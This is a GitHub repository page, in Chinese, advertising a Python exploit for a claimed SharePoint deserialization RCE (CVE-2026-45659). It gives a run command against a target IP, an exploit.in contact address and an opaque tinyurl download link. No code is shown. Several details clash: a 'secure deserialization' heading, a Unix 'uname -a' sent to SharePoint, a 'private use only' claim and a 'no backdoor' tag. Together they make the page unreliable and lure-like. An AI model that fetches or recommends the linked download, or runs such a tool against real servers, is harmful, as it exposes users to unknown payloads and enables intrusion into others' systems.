jenniferreire26/CVE-2026-45659
GitHub: jenniferreire26/CVE-2026-45659
针对 Microsoft Office SharePoint 不安全反序列化漏洞(CVE-2026-45659)的 Python 漏洞利用工具,用于在授权环境下验证远程代码执行风险。
Stars: 0 | Forks: 0
# 安全反序列化 (CVE-2026-45659)
## 概述
已确认存在一个高危漏洞,编号为 CVE-2026-45659,归类为 CWE-502,CVSS 评分为 8.8。Microsoft Office SharePoint 中不受信任数据的反序列化漏洞允许经过授权的攻击者通过网络执行代码。
## 详情
- **CVE ID**: [CVE-2026-45659](https://nvd.nist.gov/vuln/detail/CVE-2026-45659)
- **发现时间**: 2026-05-22
- **发布时间**: 2026-05-22
- **影响**: 机密性、完整性、可用性
- **Exploit 可用性**: 未公开,仅限私下使用。
## 漏洞描述
Microsoft Office SharePoint 中不受信任数据的反序列化漏洞允许经过授权的攻击者通过网络执行代码。
## 受影响版本
**Microsoft Sharepoint Server:**
- 16.0.19725.20280 之前
- 2016
- 2019
## 运行说明
要运行 exploit,你需要 Python 3.9。
执行:
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## 联系方式
如有疑问,请联系 **security@exploit.in**
## Exploit:
### [在此下载](https://tinyurl.com/2dqfspjl)
标签:CISA项目, Python, 反序列化漏洞, 威胁模拟, 安全, 无后门, 超时处理, 逆向工具